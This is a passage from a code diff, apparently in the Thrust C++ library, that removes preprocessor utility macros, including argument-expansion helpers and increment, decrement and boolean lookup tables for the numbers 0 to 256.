THRUST_PP_EXPAND_ARGS_IMPL0(__VA_ARGS__) -#define THRUST_PP_EXPAND_ARGS_IMPL0(...) __VA_ARGS__ - -#define THRUST_PP_HEAD(x, ...) x - -#define THRUST_PP_TAIL(x, ...) 
__VA_ARGS__ - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_EMPTY() - -#define THRUST_PP_COMMA() , - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_INC(x) THRUST_PP_INC_IMPL0(x) - -#define THRUST_PP_INC_IMPL0(x) THRUST_PP_CAT2(THRUST_PP_INC_IMPL_TAG, x) - -#define THRUST_PP_INC_IMPL_TAG0 1 -#define THRUST_PP_INC_IMPL_TAG1 2 -#define THRUST_PP_INC_IMPL_TAG2 3 -#define THRUST_PP_INC_IMPL_TAG3 4 -#define THRUST_PP_INC_IMPL_TAG4 5 -#define THRUST_PP_INC_IMPL_TAG5 6 -#define THRUST_PP_INC_IMPL_TAG6 7 -#define THRUST_PP_INC_IMPL_TAG7 8 -#define THRUST_PP_INC_IMPL_TAG8 9 -#define THRUST_PP_INC_IMPL_TAG9 10 -#define THRUST_PP_INC_IMPL_TAG10 11 -#define THRUST_PP_INC_IMPL_TAG11 12 -#define THRUST_PP_INC_IMPL_TAG12 13 -#define THRUST_PP_INC_IMPL_TAG13 14 -#define THRUST_PP_INC_IMPL_TAG14 15 -#define THRUST_PP_INC_IMPL_TAG15 16 -#define THRUST_PP_INC_IMPL_TAG16 17 -#define THRUST_PP_INC_IMPL_TAG17 18 -#define THRUST_PP_INC_IMPL_TAG18 19 -#define THRUST_PP_INC_IMPL_TAG19 20 -#define THRUST_PP_INC_IMPL_TAG20 21 -#define THRUST_PP_INC_IMPL_TAG21 22 -#define THRUST_PP_INC_IMPL_TAG22 23 -#define THRUST_PP_INC_IMPL_TAG23 24 -#define THRUST_PP_INC_IMPL_TAG24 25 -#define THRUST_PP_INC_IMPL_TAG25 26 -#define THRUST_PP_INC_IMPL_TAG26 27 -#define THRUST_PP_INC_IMPL_TAG27 28 -#define THRUST_PP_INC_IMPL_TAG28 29 -#define THRUST_PP_INC_IMPL_TAG29 30 -#define THRUST_PP_INC_IMPL_TAG30 31 -#define THRUST_PP_INC_IMPL_TAG31 32 -#define THRUST_PP_INC_IMPL_TAG32 33 -#define THRUST_PP_INC_IMPL_TAG33 34 -#define THRUST_PP_INC_IMPL_TAG34 35 -#define THRUST_PP_INC_IMPL_TAG35 36 -#define THRUST_PP_INC_IMPL_TAG36 37 -#define THRUST_PP_INC_IMPL_TAG37 38 -#define THRUST_PP_INC_IMPL_TAG38 39 -#define THRUST_PP_INC_IMPL_TAG39 40 -#define THRUST_PP_INC_IMPL_TAG40 41 -#define THRUST_PP_INC_IMPL_TAG41 42 -#define THRUST_PP_INC_IMPL_TAG42 43 -#define THRUST_PP_INC_IMPL_TAG43 44 -#define THRUST_PP_INC_IMPL_TAG44 45 -#define THRUST_PP_INC_IMPL_TAG45 46 -#define THRUST_PP_INC_IMPL_TAG46 47 -#define THRUST_PP_INC_IMPL_TAG47 48 -#define THRUST_PP_INC_IMPL_TAG48 49 -#define THRUST_PP_INC_IMPL_TAG49 50 -#define THRUST_PP_INC_IMPL_TAG50 51 -#define THRUST_PP_INC_IMPL_TAG51 52 -#define THRUST_PP_INC_IMPL_TAG52 53 -#define THRUST_PP_INC_IMPL_TAG53 54 -#define THRUST_PP_INC_IMPL_TAG54 55 -#define THRUST_PP_INC_IMPL_TAG55 56 -#define THRUST_PP_INC_IMPL_TAG56 57 -#define THRUST_PP_INC_IMPL_TAG57 58 -#define THRUST_PP_INC_IMPL_TAG58 59 -#define THRUST_PP_INC_IMPL_TAG59 60 -#define THRUST_PP_INC_IMPL_TAG60 61 -#define THRUST_PP_INC_IMPL_TAG61 62 -#define THRUST_PP_INC_IMPL_TAG62 63 -#define THRUST_PP_INC_IMPL_TAG63 64 -#define THRUST_PP_INC_IMPL_TAG64 65 -#define THRUST_PP_INC_IMPL_TAG65 66 -#define THRUST_PP_INC_IMPL_TAG66 67 -#define THRUST_PP_INC_IMPL_TAG67 68 -#define THRUST_PP_INC_IMPL_TAG68 69 -#define THRUST_PP_INC_IMPL_TAG69 70 -#define THRUST_PP_INC_IMPL_TAG70 71 -#define THRUST_PP_INC_IMPL_TAG71 72 -#define THRUST_PP_INC_IMPL_TAG72 73 -#define THRUST_PP_INC_IMPL_TAG73 74 -#define THRUST_PP_INC_IMPL_TAG74 75 -#define THRUST_PP_INC_IMPL_TAG75 76 -#define THRUST_PP_INC_IMPL_TAG76 77 -#define THRUST_PP_INC_IMPL_TAG77 78 -#define THRUST_PP_INC_IMPL_TAG78 79 -#define THRUST_PP_INC_IMPL_TAG79 80 -#define THRUST_PP_INC_IMPL_TAG80 81 -#define THRUST_PP_INC_IMPL_TAG81 82 -#define THRUST_PP_INC_IMPL_TAG82 83 -#define THRUST_PP_INC_IMPL_TAG83 84 -#define THRUST_PP_INC_IMPL_TAG84 85 -#define THRUST_PP_INC_IMPL_TAG85 86 -#define 
THRUST_PP_INC_IMPL_TAG86 87 -#define THRUST_PP_INC_IMPL_TAG87 88 -#define THRUST_PP_INC_IMPL_TAG88 89 -#define THRUST_PP_INC_IMPL_TAG89 90 -#define THRUST_PP_INC_IMPL_TAG90 91 -#define THRUST_PP_INC_IMPL_TAG91 92 -#define THRUST_PP_INC_IMPL_TAG92 93 -#define THRUST_PP_INC_IMPL_TAG93 94 -#define THRUST_PP_INC_IMPL_TAG94 95 -#define THRUST_PP_INC_IMPL_TAG95 96 -#define THRUST_PP_INC_IMPL_TAG96 97 -#define THRUST_PP_INC_IMPL_TAG97 98 -#define THRUST_PP_INC_IMPL_TAG98 99 -#define THRUST_PP_INC_IMPL_TAG99 100 -#define THRUST_PP_INC_IMPL_TAG100 101 -#define THRUST_PP_INC_IMPL_TAG101 102 -#define THRUST_PP_INC_IMPL_TAG102 103 -#define THRUST_PP_INC_IMPL_TAG103 104 -#define THRUST_PP_INC_IMPL_TAG104 105 -#define THRUST_PP_INC_IMPL_TAG105 106 -#define THRUST_PP_INC_IMPL_TAG106 107 -#define THRUST_PP_INC_IMPL_TAG107 108 -#define THRUST_PP_INC_IMPL_TAG108 109 -#define THRUST_PP_INC_IMPL_TAG109 110 -#define THRUST_PP_INC_IMPL_TAG110 111 -#define THRUST_PP_INC_IMPL_TAG111 112 -#define THRUST_PP_INC_IMPL_TAG112 113 -#define THRUST_PP_INC_IMPL_TAG113 114 -#define THRUST_PP_INC_IMPL_TAG114 115 -#define THRUST_PP_INC_IMPL_TAG115 116 -#define THRUST_PP_INC_IMPL_TAG116 117 -#define THRUST_PP_INC_IMPL_TAG117 118 -#define THRUST_PP_INC_IMPL_TAG118 119 -#define THRUST_PP_INC_IMPL_TAG119 120 -#define THRUST_PP_INC_IMPL_TAG120 121 -#define THRUST_PP_INC_IMPL_TAG121 122 -#define THRUST_PP_INC_IMPL_TAG122 123 -#define THRUST_PP_INC_IMPL_TAG123 124 -#define THRUST_PP_INC_IMPL_TAG124 125 -#define THRUST_PP_INC_IMPL_TAG125 126 -#define THRUST_PP_INC_IMPL_TAG126 127 -#define THRUST_PP_INC_IMPL_TAG127 128 -#define THRUST_PP_INC_IMPL_TAG128 129 -#define THRUST_PP_INC_IMPL_TAG129 130 -#define THRUST_PP_INC_IMPL_TAG130 131 -#define THRUST_PP_INC_IMPL_TAG131 132 -#define THRUST_PP_INC_IMPL_TAG132 133 -#define THRUST_PP_INC_IMPL_TAG133 134 -#define THRUST_PP_INC_IMPL_TAG134 135 -#define THRUST_PP_INC_IMPL_TAG135 136 -#define THRUST_PP_INC_IMPL_TAG136 137 -#define THRUST_PP_INC_IMPL_TAG137 138 -#define THRUST_PP_INC_IMPL_TAG138 139 -#define THRUST_PP_INC_IMPL_TAG139 140 -#define THRUST_PP_INC_IMPL_TAG140 141 -#define THRUST_PP_INC_IMPL_TAG141 142 -#define THRUST_PP_INC_IMPL_TAG142 143 -#define THRUST_PP_INC_IMPL_TAG143 144 -#define THRUST_PP_INC_IMPL_TAG144 145 -#define THRUST_PP_INC_IMPL_TAG145 146 -#define THRUST_PP_INC_IMPL_TAG146 147 -#define THRUST_PP_INC_IMPL_TAG147 148 -#define THRUST_PP_INC_IMPL_TAG148 149 -#define THRUST_PP_INC_IMPL_TAG149 150 -#define THRUST_PP_INC_IMPL_TAG150 151 -#define THRUST_PP_INC_IMPL_TAG151 152 -#define THRUST_PP_INC_IMPL_TAG152 153 -#define THRUST_PP_INC_IMPL_TAG153 154 -#define THRUST_PP_INC_IMPL_TAG154 155 -#define THRUST_PP_INC_IMPL_TAG155 156 -#define THRUST_PP_INC_IMPL_TAG156 157 -#define THRUST_PP_INC_IMPL_TAG157 158 -#define THRUST_PP_INC_IMPL_TAG158 159 -#define THRUST_PP_INC_IMPL_TAG159 160 -#define THRUST_PP_INC_IMPL_TAG160 161 -#define THRUST_PP_INC_IMPL_TAG161 162 -#define THRUST_PP_INC_IMPL_TAG162 163 -#define THRUST_PP_INC_IMPL_TAG163 164 -#define THRUST_PP_INC_IMPL_TAG164 165 -#define THRUST_PP_INC_IMPL_TAG165 166 -#define THRUST_PP_INC_IMPL_TAG166 167 -#define THRUST_PP_INC_IMPL_TAG167 168 -#define THRUST_PP_INC_IMPL_TAG168 169 -#define THRUST_PP_INC_IMPL_TAG169 170 -#define THRUST_PP_INC_IMPL_TAG170 171 -#define THRUST_PP_INC_IMPL_TAG171 172 -#define THRUST_PP_INC_IMPL_TAG172 173 -#define THRUST_PP_INC_IMPL_TAG173 174 -#define THRUST_PP_INC_IMPL_TAG174 175 -#define THRUST_PP_INC_IMPL_TAG175 176 -#define THRUST_PP_INC_IMPL_TAG176 177 -#define THRUST_PP_INC_IMPL_TAG177 178 
-#define THRUST_PP_INC_IMPL_TAG178 179 -#define THRUST_PP_INC_IMPL_TAG179 180 -#define THRUST_PP_INC_IMPL_TAG180 181 -#define THRUST_PP_INC_IMPL_TAG181 182 -#define THRUST_PP_INC_IMPL_TAG182 183 -#define THRUST_PP_INC_IMPL_TAG183 184 -#define THRUST_PP_INC_IMPL_TAG184 185 -#define THRUST_PP_INC_IMPL_TAG185 186 -#define THRUST_PP_INC_IMPL_TAG186 187 -#define THRUST_PP_INC_IMPL_TAG187 188 -#define THRUST_PP_INC_IMPL_TAG188 189 -#define THRUST_PP_INC_IMPL_TAG189 190 -#define THRUST_PP_INC_IMPL_TAG190 191 -#define THRUST_PP_INC_IMPL_TAG191 192 -#define THRUST_PP_INC_IMPL_TAG192 193 -#define THRUST_PP_INC_IMPL_TAG193 194 -#define THRUST_PP_INC_IMPL_TAG194 195 -#define THRUST_PP_INC_IMPL_TAG195 196 -#define THRUST_PP_INC_IMPL_TAG196 197 -#define THRUST_PP_INC_IMPL_TAG197 198 -#define THRUST_PP_INC_IMPL_TAG198 199 -#define THRUST_PP_INC_IMPL_TAG199 200 -#define THRUST_PP_INC_IMPL_TAG200 201 -#define THRUST_PP_INC_IMPL_TAG201 202 -#define THRUST_PP_INC_IMPL_TAG202 203 -#define THRUST_PP_INC_IMPL_TAG203 204 -#define THRUST_PP_INC_IMPL_TAG204 205 -#define THRUST_PP_INC_IMPL_TAG205 206 -#define THRUST_PP_INC_IMPL_TAG206 207 -#define THRUST_PP_INC_IMPL_TAG207 208 -#define THRUST_PP_INC_IMPL_TAG208 209 -#define THRUST_PP_INC_IMPL_TAG209 210 -#define THRUST_PP_INC_IMPL_TAG210 211 -#define THRUST_PP_INC_IMPL_TAG211 212 -#define THRUST_PP_INC_IMPL_TAG212 213 -#define THRUST_PP_INC_IMPL_TAG213 214 -#define THRUST_PP_INC_IMPL_TAG214 215 -#define THRUST_PP_INC_IMPL_TAG215 216 -#define THRUST_PP_INC_IMPL_TAG216 217 -#define THRUST_PP_INC_IMPL_TAG217 218 -#define THRUST_PP_INC_IMPL_TAG218 219 -#define THRUST_PP_INC_IMPL_TAG219 220 -#define THRUST_PP_INC_IMPL_TAG220 221 -#define THRUST_PP_INC_IMPL_TAG221 222 -#define THRUST_PP_INC_IMPL_TAG222 223 -#define THRUST_PP_INC_IMPL_TAG223 224 -#define THRUST_PP_INC_IMPL_TAG224 225 -#define THRUST_PP_INC_IMPL_TAG225 226 -#define THRUST_PP_INC_IMPL_TAG226 227 -#define THRUST_PP_INC_IMPL_TAG227 228 -#define THRUST_PP_INC_IMPL_TAG228 229 -#define THRUST_PP_INC_IMPL_TAG229 230 -#define THRUST_PP_INC_IMPL_TAG230 231 -#define THRUST_PP_INC_IMPL_TAG231 232 -#define THRUST_PP_INC_IMPL_TAG232 233 -#define THRUST_PP_INC_IMPL_TAG233 234 -#define THRUST_PP_INC_IMPL_TAG234 235 -#define THRUST_PP_INC_IMPL_TAG235 236 -#define THRUST_PP_INC_IMPL_TAG236 237 -#define THRUST_PP_INC_IMPL_TAG237 238 -#define THRUST_PP_INC_IMPL_TAG238 239 -#define THRUST_PP_INC_IMPL_TAG239 240 -#define THRUST_PP_INC_IMPL_TAG240 241 -#define THRUST_PP_INC_IMPL_TAG241 242 -#define THRUST_PP_INC_IMPL_TAG242 243 -#define THRUST_PP_INC_IMPL_TAG243 244 -#define THRUST_PP_INC_IMPL_TAG244 245 -#define THRUST_PP_INC_IMPL_TAG245 246 -#define THRUST_PP_INC_IMPL_TAG246 247 -#define THRUST_PP_INC_IMPL_TAG247 248 -#define THRUST_PP_INC_IMPL_TAG248 249 -#define THRUST_PP_INC_IMPL_TAG249 250 -#define THRUST_PP_INC_IMPL_TAG250 251 -#define THRUST_PP_INC_IMPL_TAG251 252 -#define THRUST_PP_INC_IMPL_TAG252 253 -#define THRUST_PP_INC_IMPL_TAG253 254 -#define THRUST_PP_INC_IMPL_TAG254 255 -#define THRUST_PP_INC_IMPL_TAG255 256 -#define THRUST_PP_INC_IMPL_TAG256 256 - -#define THRUST_PP_DEC(x) THRUST_PP_DEC_IMPL0(x) - -#define THRUST_PP_DEC_IMPL0(x) THRUST_PP_CAT2(THRUST_PP_DEC_IMPL_TAG, x) - -#define THRUST_PP_DEC_IMPL_TAG0 0 -#define THRUST_PP_DEC_IMPL_TAG1 0 -#define THRUST_PP_DEC_IMPL_TAG2 1 -#define THRUST_PP_DEC_IMPL_TAG3 2 -#define THRUST_PP_DEC_IMPL_TAG4 3 -#define THRUST_PP_DEC_IMPL_TAG5 4 -#define THRUST_PP_DEC_IMPL_TAG6 5 -#define THRUST_PP_DEC_IMPL_TAG7 6 -#define THRUST_PP_DEC_IMPL_TAG8 7 -#define 
THRUST_PP_DEC_IMPL_TAG9 8 -#define THRUST_PP_DEC_IMPL_TAG10 9 -#define THRUST_PP_DEC_IMPL_TAG11 10 -#define THRUST_PP_DEC_IMPL_TAG12 11 -#define THRUST_PP_DEC_IMPL_TAG13 12 -#define THRUST_PP_DEC_IMPL_TAG14 13 -#define THRUST_PP_DEC_IMPL_TAG15 14 -#define THRUST_PP_DEC_IMPL_TAG16 15 -#define THRUST_PP_DEC_IMPL_TAG17 16 -#define THRUST_PP_DEC_IMPL_TAG18 17 -#define THRUST_PP_DEC_IMPL_TAG19 18 -#define THRUST_PP_DEC_IMPL_TAG20 19 -#define THRUST_PP_DEC_IMPL_TAG21 20 -#define THRUST_PP_DEC_IMPL_TAG22 21 -#define THRUST_PP_DEC_IMPL_TAG23 22 -#define THRUST_PP_DEC_IMPL_TAG24 23 -#define THRUST_PP_DEC_IMPL_TAG25 24 -#define THRUST_PP_DEC_IMPL_TAG26 25 -#define THRUST_PP_DEC_IMPL_TAG27 26 -#define THRUST_PP_DEC_IMPL_TAG28 27 -#define THRUST_PP_DEC_IMPL_TAG29 28 -#define THRUST_PP_DEC_IMPL_TAG30 29 -#define THRUST_PP_DEC_IMPL_TAG31 30 -#define THRUST_PP_DEC_IMPL_TAG32 31 -#define THRUST_PP_DEC_IMPL_TAG33 32 -#define THRUST_PP_DEC_IMPL_TAG34 33 -#define THRUST_PP_DEC_IMPL_TAG35 34 -#define THRUST_PP_DEC_IMPL_TAG36 35 -#define THRUST_PP_DEC_IMPL_TAG37 36 -#define THRUST_PP_DEC_IMPL_TAG38 37 -#define THRUST_PP_DEC_IMPL_TAG39 38 -#define THRUST_PP_DEC_IMPL_TAG40 39 -#define THRUST_PP_DEC_IMPL_TAG41 40 -#define THRUST_PP_DEC_IMPL_TAG42 41 -#define THRUST_PP_DEC_IMPL_TAG43 42 -#define THRUST_PP_DEC_IMPL_TAG44 43 -#define THRUST_PP_DEC_IMPL_TAG45 44 -#define THRUST_PP_DEC_IMPL_TAG46 45 -#define THRUST_PP_DEC_IMPL_TAG47 46 -#define THRUST_PP_DEC_IMPL_TAG48 47 -#define THRUST_PP_DEC_IMPL_TAG49 48 -#define THRUST_PP_DEC_IMPL_TAG50 49 -#define THRUST_PP_DEC_IMPL_TAG51 50 -#define THRUST_PP_DEC_IMPL_TAG52 51 -#define THRUST_PP_DEC_IMPL_TAG53 52 -#define THRUST_PP_DEC_IMPL_TAG54 53 -#define THRUST_PP_DEC_IMPL_TAG55 54 -#define THRUST_PP_DEC_IMPL_TAG56 55 -#define THRUST_PP_DEC_IMPL_TAG57 56 -#define THRUST_PP_DEC_IMPL_TAG58 57 -#define THRUST_PP_DEC_IMPL_TAG59 58 -#define THRUST_PP_DEC_IMPL_TAG60 59 -#define THRUST_PP_DEC_IMPL_TAG61 60 -#define THRUST_PP_DEC_IMPL_TAG62 61 -#define THRUST_PP_DEC_IMPL_TAG63 62 -#define THRUST_PP_DEC_IMPL_TAG64 63 -#define THRUST_PP_DEC_IMPL_TAG65 64 -#define THRUST_PP_DEC_IMPL_TAG66 65 -#define THRUST_PP_DEC_IMPL_TAG67 66 -#define THRUST_PP_DEC_IMPL_TAG68 67 -#define THRUST_PP_DEC_IMPL_TAG69 68 -#define THRUST_PP_DEC_IMPL_TAG70 69 -#define THRUST_PP_DEC_IMPL_TAG71 70 -#define THRUST_PP_DEC_IMPL_TAG72 71 -#define THRUST_PP_DEC_IMPL_TAG73 72 -#define THRUST_PP_DEC_IMPL_TAG74 73 -#define THRUST_PP_DEC_IMPL_TAG75 74 -#define THRUST_PP_DEC_IMPL_TAG76 75 -#define THRUST_PP_DEC_IMPL_TAG77 76 -#define THRUST_PP_DEC_IMPL_TAG78 77 -#define THRUST_PP_DEC_IMPL_TAG79 78 -#define THRUST_PP_DEC_IMPL_TAG80 79 -#define THRUST_PP_DEC_IMPL_TAG81 80 -#define THRUST_PP_DEC_IMPL_TAG82 81 -#define THRUST_PP_DEC_IMPL_TAG83 82 -#define THRUST_PP_DEC_IMPL_TAG84 83 -#define THRUST_PP_DEC_IMPL_TAG85 84 -#define THRUST_PP_DEC_IMPL_TAG86 85 -#define THRUST_PP_DEC_IMPL_TAG87 86 -#define THRUST_PP_DEC_IMPL_TAG88 87 -#define THRUST_PP_DEC_IMPL_TAG89 88 -#define THRUST_PP_DEC_IMPL_TAG90 89 -#define THRUST_PP_DEC_IMPL_TAG91 90 -#define THRUST_PP_DEC_IMPL_TAG92 91 -#define THRUST_PP_DEC_IMPL_TAG93 92 -#define THRUST_PP_DEC_IMPL_TAG94 93 -#define THRUST_PP_DEC_IMPL_TAG95 94 -#define THRUST_PP_DEC_IMPL_TAG96 95 -#define THRUST_PP_DEC_IMPL_TAG97 96 -#define THRUST_PP_DEC_IMPL_TAG98 97 -#define THRUST_PP_DEC_IMPL_TAG99 98 -#define THRUST_PP_DEC_IMPL_TAG100 99 -#define THRUST_PP_DEC_IMPL_TAG101 100 -#define THRUST_PP_DEC_IMPL_TAG102 101 -#define THRUST_PP_DEC_IMPL_TAG103 102 -#define THRUST_PP_DEC_IMPL_TAG104 103 
-#define THRUST_PP_DEC_IMPL_TAG105 104 -#define THRUST_PP_DEC_IMPL_TAG106 105 -#define THRUST_PP_DEC_IMPL_TAG107 106 -#define THRUST_PP_DEC_IMPL_TAG108 107 -#define THRUST_PP_DEC_IMPL_TAG109 108 -#define THRUST_PP_DEC_IMPL_TAG110 109 -#define THRUST_PP_DEC_IMPL_TAG111 110 -#define THRUST_PP_DEC_IMPL_TAG112 111 -#define THRUST_PP_DEC_IMPL_TAG113 112 -#define THRUST_PP_DEC_IMPL_TAG114 113 -#define THRUST_PP_DEC_IMPL_TAG115 114 -#define THRUST_PP_DEC_IMPL_TAG116 115 -#define THRUST_PP_DEC_IMPL_TAG117 116 -#define THRUST_PP_DEC_IMPL_TAG118 117 -#define THRUST_PP_DEC_IMPL_TAG119 118 -#define THRUST_PP_DEC_IMPL_TAG120 119 -#define THRUST_PP_DEC_IMPL_TAG121 120 -#define THRUST_PP_DEC_IMPL_TAG122 121 -#define THRUST_PP_DEC_IMPL_TAG123 122 -#define THRUST_PP_DEC_IMPL_TAG124 123 -#define THRUST_PP_DEC_IMPL_TAG125 124 -#define THRUST_PP_DEC_IMPL_TAG126 125 -#define THRUST_PP_DEC_IMPL_TAG127 126 -#define THRUST_PP_DEC_IMPL_TAG128 127 -#define THRUST_PP_DEC_IMPL_TAG129 128 -#define THRUST_PP_DEC_IMPL_TAG130 129 -#define THRUST_PP_DEC_IMPL_TAG131 130 -#define THRUST_PP_DEC_IMPL_TAG132 131 -#define THRUST_PP_DEC_IMPL_TAG133 132 -#define THRUST_PP_DEC_IMPL_TAG134 133 -#define THRUST_PP_DEC_IMPL_TAG135 134 -#define THRUST_PP_DEC_IMPL_TAG136 135 -#define THRUST_PP_DEC_IMPL_TAG137 136 -#define THRUST_PP_DEC_IMPL_TAG138 137 -#define THRUST_PP_DEC_IMPL_TAG139 138 -#define THRUST_PP_DEC_IMPL_TAG140 139 -#define THRUST_PP_DEC_IMPL_TAG141 140 -#define THRUST_PP_DEC_IMPL_TAG142 141 -#define THRUST_PP_DEC_IMPL_TAG143 142 -#define THRUST_PP_DEC_IMPL_TAG144 143 -#define THRUST_PP_DEC_IMPL_TAG145 144 -#define THRUST_PP_DEC_IMPL_TAG146 145 -#define THRUST_PP_DEC_IMPL_TAG147 146 -#define THRUST_PP_DEC_IMPL_TAG148 147 -#define THRUST_PP_DEC_IMPL_TAG149 148 -#define THRUST_PP_DEC_IMPL_TAG150 149 -#define THRUST_PP_DEC_IMPL_TAG151 150 -#define THRUST_PP_DEC_IMPL_TAG152 151 -#define THRUST_PP_DEC_IMPL_TAG153 152 -#define THRUST_PP_DEC_IMPL_TAG154 153 -#define THRUST_PP_DEC_IMPL_TAG155 154 -#define THRUST_PP_DEC_IMPL_TAG156 155 -#define THRUST_PP_DEC_IMPL_TAG157 156 -#define THRUST_PP_DEC_IMPL_TAG158 157 -#define THRUST_PP_DEC_IMPL_TAG159 158 -#define THRUST_PP_DEC_IMPL_TAG160 159 -#define THRUST_PP_DEC_IMPL_TAG161 160 -#define THRUST_PP_DEC_IMPL_TAG162 161 -#define THRUST_PP_DEC_IMPL_TAG163 162 -#define THRUST_PP_DEC_IMPL_TAG164 163 -#define THRUST_PP_DEC_IMPL_TAG165 164 -#define THRUST_PP_DEC_IMPL_TAG166 165 -#define THRUST_PP_DEC_IMPL_TAG167 166 -#define THRUST_PP_DEC_IMPL_TAG168 167 -#define THRUST_PP_DEC_IMPL_TAG169 168 -#define THRUST_PP_DEC_IMPL_TAG170 169 -#define THRUST_PP_DEC_IMPL_TAG171 170 -#define THRUST_PP_DEC_IMPL_TAG172 171 -#define THRUST_PP_DEC_IMPL_TAG173 172 -#define THRUST_PP_DEC_IMPL_TAG174 173 -#define THRUST_PP_DEC_IMPL_TAG175 174 -#define THRUST_PP_DEC_IMPL_TAG176 175 -#define THRUST_PP_DEC_IMPL_TAG177 176 -#define THRUST_PP_DEC_IMPL_TAG178 177 -#define THRUST_PP_DEC_IMPL_TAG179 178 -#define THRUST_PP_DEC_IMPL_TAG180 179 -#define THRUST_PP_DEC_IMPL_TAG181 180 -#define THRUST_PP_DEC_IMPL_TAG182 181 -#define THRUST_PP_DEC_IMPL_TAG183 182 -#define THRUST_PP_DEC_IMPL_TAG184 183 -#define THRUST_PP_DEC_IMPL_TAG185 184 -#define THRUST_PP_DEC_IMPL_TAG186 185 -#define THRUST_PP_DEC_IMPL_TAG187 186 -#define THRUST_PP_DEC_IMPL_TAG188 187 -#define THRUST_PP_DEC_IMPL_TAG189 188 -#define THRUST_PP_DEC_IMPL_TAG190 189 -#define THRUST_PP_DEC_IMPL_TAG191 190 -#define THRUST_PP_DEC_IMPL_TAG192 191 -#define THRUST_PP_DEC_IMPL_TAG193 192 -#define THRUST_PP_DEC_IMPL_TAG194 193 -#define THRUST_PP_DEC_IMPL_TAG195 194 
-#define THRUST_PP_DEC_IMPL_TAG196 195 -#define THRUST_PP_DEC_IMPL_TAG197 196 -#define THRUST_PP_DEC_IMPL_TAG198 197 -#define THRUST_PP_DEC_IMPL_TAG199 198 -#define THRUST_PP_DEC_IMPL_TAG200 199 -#define THRUST_PP_DEC_IMPL_TAG201 200 -#define THRUST_PP_DEC_IMPL_TAG202 201 -#define THRUST_PP_DEC_IMPL_TAG203 202 -#define THRUST_PP_DEC_IMPL_TAG204 203 -#define THRUST_PP_DEC_IMPL_TAG205 204 -#define THRUST_PP_DEC_IMPL_TAG206 205 -#define THRUST_PP_DEC_IMPL_TAG207 206 -#define THRUST_PP_DEC_IMPL_TAG208 207 -#define THRUST_PP_DEC_IMPL_TAG209 208 -#define THRUST_PP_DEC_IMPL_TAG210 209 -#define THRUST_PP_DEC_IMPL_TAG211 210 -#define THRUST_PP_DEC_IMPL_TAG212 211 -#define THRUST_PP_DEC_IMPL_TAG213 212 -#define THRUST_PP_DEC_IMPL_TAG214 213 -#define THRUST_PP_DEC_IMPL_TAG215 214 -#define THRUST_PP_DEC_IMPL_TAG216 215 -#define THRUST_PP_DEC_IMPL_TAG217 216 -#define THRUST_PP_DEC_IMPL_TAG218 217 -#define THRUST_PP_DEC_IMPL_TAG219 218 -#define THRUST_PP_DEC_IMPL_TAG220 219 -#define THRUST_PP_DEC_IMPL_TAG221 220 -#define THRUST_PP_DEC_IMPL_TAG222 221 -#define THRUST_PP_DEC_IMPL_TAG223 222 -#define THRUST_PP_DEC_IMPL_TAG224 223 -#define THRUST_PP_DEC_IMPL_TAG225 224 -#define THRUST_PP_DEC_IMPL_TAG226 225 -#define THRUST_PP_DEC_IMPL_TAG227 226 -#define THRUST_PP_DEC_IMPL_TAG228 227 -#define THRUST_PP_DEC_IMPL_TAG229 228 -#define THRUST_PP_DEC_IMPL_TAG230 229 -#define THRUST_PP_DEC_IMPL_TAG231 230 -#define THRUST_PP_DEC_IMPL_TAG232 231 -#define THRUST_PP_DEC_IMPL_TAG233 232 -#define THRUST_PP_DEC_IMPL_TAG234 233 -#define THRUST_PP_DEC_IMPL_TAG235 234 -#define THRUST_PP_DEC_IMPL_TAG236 235 -#define THRUST_PP_DEC_IMPL_TAG237 236 -#define THRUST_PP_DEC_IMPL_TAG238 237 -#define THRUST_PP_DEC_IMPL_TAG239 238 -#define THRUST_PP_DEC_IMPL_TAG240 239 -#define THRUST_PP_DEC_IMPL_TAG241 240 -#define THRUST_PP_DEC_IMPL_TAG242 241 -#define THRUST_PP_DEC_IMPL_TAG243 242 -#define THRUST_PP_DEC_IMPL_TAG244 243 -#define THRUST_PP_DEC_IMPL_TAG245 244 -#define THRUST_PP_DEC_IMPL_TAG246 245 -#define THRUST_PP_DEC_IMPL_TAG247 246 -#define THRUST_PP_DEC_IMPL_TAG248 247 -#define THRUST_PP_DEC_IMPL_TAG249 248 -#define THRUST_PP_DEC_IMPL_TAG250 249 -#define THRUST_PP_DEC_IMPL_TAG251 250 -#define THRUST_PP_DEC_IMPL_TAG252 251 -#define THRUST_PP_DEC_IMPL_TAG253 252 -#define THRUST_PP_DEC_IMPL_TAG254 253 -#define THRUST_PP_DEC_IMPL_TAG255 254 -#define THRUST_PP_DEC_IMPL_TAG256 255 -#define THRUST_PP_DEC_IMPL_TAG257 256 - -#define THRUST_PP_BOOL(x) THRUST_PP_BOOL_IMPL0(x) - -#define THRUST_PP_BOOL_IMPL0(x) THRUST_PP_CAT2(THRUST_PP_BOOL_IMPL_TAG, x) - -#define THRUST_PP_BOOL_IMPL_TAG0 0 -#define THRUST_PP_BOOL_IMPL_TAG1 1 -#define THRUST_PP_BOOL_IMPL_TAG2 1 -#define THRUST_PP_BOOL_IMPL_TAG3 1 -#define THRUST_PP_BOOL_IMPL_TAG4 1 -#define THRUST_PP_BOOL_IMPL_TAG5 1 -#define THRUST_PP_BOOL_IMPL_TAG6 1 -#define THRUST_PP_BOOL_IMPL_TAG7 1 -#define THRUST_PP_BOOL_IMPL_TAG8 1 -#define THRUST_PP_BOOL_IMPL_TAG9 1 -#define THRUST_PP_BOOL_IMPL_TAG10 1 -#define THRUST_PP_BOOL_IMPL_TAG11 1 -#define THRUST_PP_BOOL_IMPL_TAG12 1 -#define THRUST_PP_BOOL_IMPL_TAG13 1 -#define THRUST_PP_BOOL_IMPL_TAG14 1 -#define THRUST_PP_BOOL_IMPL_TAG15 1 -#define THRUST_PP_BOOL_IMPL_TAG16 1 -#define THRUST_PP_BOOL_IMPL_TAG17 1 -#define THRUST_PP_BOOL_IMPL_TAG18 1 -#define THRUST_PP_BOOL_IMPL_TAG19 1 -#define THRUST_PP_BOOL_IMPL_TAG20 1 -#define THRUST_PP_BOOL_IMPL_TAG21 1 -#define THRUST_PP_BOOL_IMPL_TAG22 1 -#define THRUST_PP_BOOL_IMPL_TAG23 1 -#define THRUST_PP_BOOL_IMPL_TAG24 1 -#define THRUST_PP_BOOL_IMPL_TAG25 1 -#define THRUST_PP_BOOL_IMPL_TAG26 1 -#define 
